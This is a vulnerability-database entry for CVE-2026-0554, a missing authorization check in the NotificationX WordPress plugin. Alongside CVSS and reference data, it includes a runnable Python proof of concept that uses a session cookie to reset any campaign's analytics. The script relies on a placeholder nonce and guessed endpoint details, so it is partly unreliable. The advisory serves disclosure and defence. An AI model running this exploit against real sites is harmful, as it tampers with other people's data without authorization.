Security Vulnerability Report
中文
CVE-2026-0554 CVSS 4.3 MEDIUM

CVE-2026-0554

Published: 2026-01-20 15:20:07
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The NotificationX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'regenerate' and 'reset' REST API endpoints in all versions up to, and including, 3.1.11. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset analytics for any NotificationX campaign, regardless of ownership.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NotificationX Plugin < 3.1.12
NotificationX Plugin <= 3.1.11 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-0554 PoC - NotificationX Unauthorized Analytics Reset # Target: WordPress site with NotificationX plugin <= 3.1.11 def exploit_notificationx(target_url, wp_session_cookie, campaign_id): """ Exploit for CVE-2026-0554: Missing authorization on REST API endpoints Allows authenticated users (Contributor+) to reset any campaign analytics """ target = target_url.rstrip('/') # Step 1: Reset campaign analytics via REST API reset_endpoint = f"{target}/wp-json/notificationx/v1/reset" headers = { 'Content-Type': 'application/json', 'Cookie': wp_session_cookie, 'X-WP-Nonce': 'required_nonce_here' # May need to fetch from page } # Payload to reset specific campaign analytics reset_payload = { 'id': campaign_id, 'type': 'notification', 'reset': True } print(f"[*] Targeting: {target}") print(f"[*] Campaign ID: {campaign_id}") print(f"[*] Sending reset request to: {reset_endpoint}") try: response = requests.post(reset_endpoint, json=reset_payload, headers=headers) if response.status_code == 200: print("[+] Successfully reset campaign analytics!") print(f"[+] Response: {response.json()}") return True else: print(f"[-] Failed with status: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def get_campaign_list(target_url, wp_session_cookie): """ Retrieve list of all NotificationX campaigns """ target = target_url.rstrip('/') list_endpoint = f"{target}/wp-json/notificationx/v1/campaigns" headers = { 'Cookie': wp_session_cookie } print(f"[*] Fetching campaign list...") try: response = requests.get(list_endpoint, headers=headers) if response.status_code == 200: campaigns = response.json() print(f"[+] Found {len(campaigns)} campaigns") for camp in campaigns: print(f" - ID: {camp.get('id')}, Title: {camp.get('title')}") return campaigns else: print(f"[-] Failed to fetch campaigns") return [] except Exception as e: print(f"[-] Error: {e}") return [] if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2026-0554.py <target_url> <session_cookie> <campaign_id>") print("Example: python cve-2026-0554.py http://example.com 'wordpress_logged_in_xxx' 123") sys.exit(1) target_url = sys.argv[1] session_cookie = sys.argv[2] campaign_id = int(sys.argv[3]) # First list all campaigns to identify targets get_campaign_list(target_url, session_cookie) # Then exploit the vulnerability exploit_notificationx(target_url, session_cookie, campaign_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0554", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:20:06.853", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NotificationX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'regenerate' and 'reset' REST API endpoints in all versions up to, and including, 3.1.11. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset analytics for any NotificationX campaign, regardless of ownership."}, {"lang": "es", "value": "El plugin NotificationX para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en los endpoints de la API REST 'regenerate' y 'reset' en todas las versiones hasta la 3.1.11, inclusive. Esto permite a atacantes autenticados, con acceso de nivel Colaborador y superior, restablecer las analíticas para cualquier campaña de NotificationX, independientemente de la propiedad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2026-0554", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3cd843b-ab38-45c4-a661-78d4e6db5201?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.